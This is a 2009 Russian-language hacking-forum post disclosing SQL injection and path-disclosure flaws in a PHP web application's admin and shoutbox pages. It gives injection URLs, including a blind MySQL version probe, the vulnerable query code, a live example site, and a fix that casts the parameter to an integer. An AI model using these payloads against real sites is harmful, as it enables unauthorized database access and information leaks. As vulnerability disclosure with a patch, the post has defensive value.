13.08.2009, 09:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Требуются права админа 
SQL-inj
index.php?page=admin&user=2&code=8355071'&do=prune u
SQL-inj
Наврал ,  права пользователя нужны
index.php?page=allshout&sid=1'&edit
index.php?page=allshout&sid=1'&delete
уязвимый код :
Код:
$sid = isset($_GET["sid"])?$_GET["sid"]:0; # get shout id (sid)and set it to zero for bool
$sql = "SELECT * FROM {$TABLE_PREFIX}chat WHERE id > ".$lastID." AND id != ".$sid." ORDER BY id DESC";
пример :
Код:
http://lampmaster.dk/index.php?page=allshout&sid=1'&edit
решение проблемы:
Код:
$sid = isset($_GET["sid"])?(int)$_GET["sid"]:0; # get shout id (sid)and set it to zero for bool
$sql = "SELECT * FROM {$TABLE_PREFIX}chat WHERE id > ".$lastID." AND id != ".$sid." ORDER BY id DESC";
index.php?page=allshout&sid=1+and+substring(versio n(),1,1)=5/*&edit
Раскрытие путей
если создан хоть один топик в форуме
index.php?page=forum&action=viewforum&forumid[]=
index.php?page=forum&action=viewtopic&topicid[]=
Последний раз редактировалось HAXTA4OK; 15.08.2009 в 18:32..
|
|
|